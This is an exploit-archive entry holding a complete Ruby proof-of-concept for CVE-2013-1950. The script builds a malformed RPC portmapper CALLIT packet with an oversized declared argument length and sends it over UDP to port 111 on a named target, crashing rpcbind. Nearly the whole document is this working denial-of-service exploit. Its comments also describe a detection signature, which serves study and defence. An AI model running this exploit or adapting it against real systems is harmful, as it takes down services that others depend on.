rpcbind - CALLIT procedure UDP Crash (PoC)

Author: Sean Verity
type: dos
platform: linux
port: 
date_added: 2013-07-16  
date_updated: 2013-07-16  
verified: 0  
codes: CVE-2013-1950;OSVDB-95447  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 26887.rb  
#!/usr/bin/ruby
#
#	rpcbind_udp_crash_poc.rb
#	07/15/2013
#	Sean Verity <veritysr1980 [at] gmail.com>
#	CVE 2013-1950
#
#	rpcbind (CALLIT Procedure) UDP Crash PoC
#	Affected Software Package: rpcbind-0.2.0-19
#
#	Tested on:
#	Fedora 17 (3.9.8-100.fc17.x86_64 #1 SMP)
#	CentOS 6.3 Final (2.6.32-279.22.1.el6.x86_64 #1 SMP)
#
#	rpcbind can be crashed by setting the argument length
#	value > 8944 in an RPC CALLIT procedure request over UDP.
#

require 'socket'

# Prints the invocation hint to stderr and terminates the process with a
# non-zero status; never returns.
def usage
	hint = "\nusage: ./rpcbind_udp_crash_poc.rb <target>\n\n"
	abort(hint)
end

# Entry point: with exactly one argument (the target host), build a single
# ONC RPC v2 CALL message for the portmapper CALLIT procedure and send it
# once over UDP to port 111. Every field is a big-endian 32-bit word
# (`pack('N')`), matching the XDR encoding of the RPC header.
if ARGV.length == 1
	pkt = [rand(2**32)].pack('N')	# XID
	pkt << [0].pack('N')			# Message Type: CALL (0)
	pkt << [2].pack('N')			# RPC Version: 2
	pkt << [100000].pack('N')		# Program: Portmap (100000)
	pkt << [2].pack('N')			# Program Version: 2
	pkt << [5].pack('N')			# Procedure: CALLIT (5)
	pkt << [0].pack('N')			# Credentials Flavor: AUTH_NULL (0)
	pkt << [0].pack('N')			# Length: 0
	pkt << [0].pack('N')			# Credentials Verifier: AUTH_NULL (0)
	pkt << [0].pack('N')			# Length: 0
	# CALLIT body: the program/version/procedure the portmapper is asked to
	# forward to, followed by the forwarded arguments as an XDR opaque.
	pkt << [0].pack('N')			# Program: Unknown (0)
	pkt << [1].pack('N')			# Version: 1
	pkt << [1].pack('N')			# Procedure: 1
	# The declared opaque length (8945) is one above the 8944 limit named in
	# the file header, yet only 5 bytes of arguments follow. This mismatch
	# between the declared argument length and the bytes actually present in
	# the datagram is the trigger condition and is the property a detection
	# rule for this CVE can key on (CALLIT request, declared length > 8944,
	# datagram too short to hold it).
	pkt << [8945].pack('N')			# Argument Length
	pkt << "crash"					# Arguments

	# Fire-and-forget: one datagram, no reply is read. The socket is never
	# closed explicitly; the process exits right after, so the descriptor is
	# reclaimed by the OS. ARGV[0] is passed to send unvalidated — a bad host
	# name surfaces as a SocketError from the resolver.
	s = UDPSocket.new
	s.send(pkt, 0, ARGV[0], 111)
else
	usage
end